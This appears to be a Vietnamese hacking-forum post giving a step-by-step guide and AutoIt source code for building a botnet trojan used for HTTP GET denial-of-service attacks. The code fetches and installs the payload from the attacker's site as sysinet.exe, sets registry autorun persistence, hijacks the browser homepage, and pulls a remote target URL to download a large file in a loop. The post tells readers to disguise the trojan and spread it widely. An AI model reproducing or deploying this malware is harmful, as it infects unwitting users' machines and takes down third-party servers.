Thực tập DDOS thông qua HTTP GET
Source AutoIT 3
http://www.4shared.com/file/55243733...6f/AutoIT.html
Nếu 1 website bảo mật wá , bạn úynh ko đc nó
, cũng không đụng đc tới web server của nó thì chúng ta chơi chiêu bài cuối , không ăn được là đạp.
Tấn công từ chối dịch vụ DOS : Denial Of Service . ko chiếm quyền điều khiển mà mục đích là làm cho dich vụ đối phương cung cấp bị tê liệt .
DDOS : Distribute Denial Of Service : Tấn công từ chối dịch vụ phân tán , sử dụng hệ thống mạng botnet để tấn công .
Botnet : Hệ thống các máy tính zombie bị lây nhiễm các trojan , khi nhận lệnh của ta sẽ đồng loạt tấn công .
Sau đây là 1 cách DDOS thông qua HTTP Get , không ghê gớm lắm nhưng cũng làm đc khối tên ói máu nếu mạng botnet của bạn lớn
- Download và Cài AutoIT
- Tạo file script sau
- Compile thành file exe
- Tạo 1 website của bạn , upload file exe lên với tên trojan.txt
- Nhúng trojan này vào 1 cái gì đó hấp dẫn và quăng toán loạn
================================================== =====
|
Trích dẫn:
|
$website = "http://yourdomain/"
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\sysinet.exe") Then
InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1)
Sleep(5000)
EndIf
|
Đoạn mã trên để download trojan về máy nạn nhân , và rename lại thành file .exe để có khả năng thực thi. [ tại host free ko cho up exe
]
|
Trích dẫn:
|
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")
|
Đoạn trên tạo các giá trị tự động chạy cho trojan sysinet.exe . Disable taskmanager và regedit của đối tượng
Ở đây mình set là 0 vì làm phiền đối tượng nó cáu cài lại máy thì phiền
. Mình chỉ mượn tay nó đánh phụ thoy , nên tử tế chút
|
Trích dẫn:
|
InetGet ($website & "/setting.txt", @WindowsDir & "\setting.txt", 0, 1)
Sleep(5000)
$taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0)
$sitetancong = FileReadLine($taptinmoi)
$thoigian = FileReadLine($taptinmoi)
FileClose($taptinmoi)
while(1)
InetGet ($sitetancong, @windowsDir , 0, 1)
sleep($thoigian)
wend
|
Đoạn này sẽ đọc file settings trên web site của bạn và bắt đầu download dữ liệu từ server về
file setting.txt đặt trên
http://yourdomain/
và có nội dụng như sau
dòng 1 : link direct tới file cần download
dòng 2 : thời gian ngủ mỗi lần download
-----------------------------------------------------------------------
ví dụ :
http://abc.com/test.wmv << link direct . file size= 300 mb
300000 << vì file bự , cho ngủ 5 phút .
-----------------------------------------------------------------------
Chỉ cần khoảng vài trăm mạng cùng down bộ phim này thì cái server sẽ ra sao nhỉ
----------------------------------------------------------------------
Bass
----------------------------------------------------------------------
Chúc anh em vọc vui vẻ
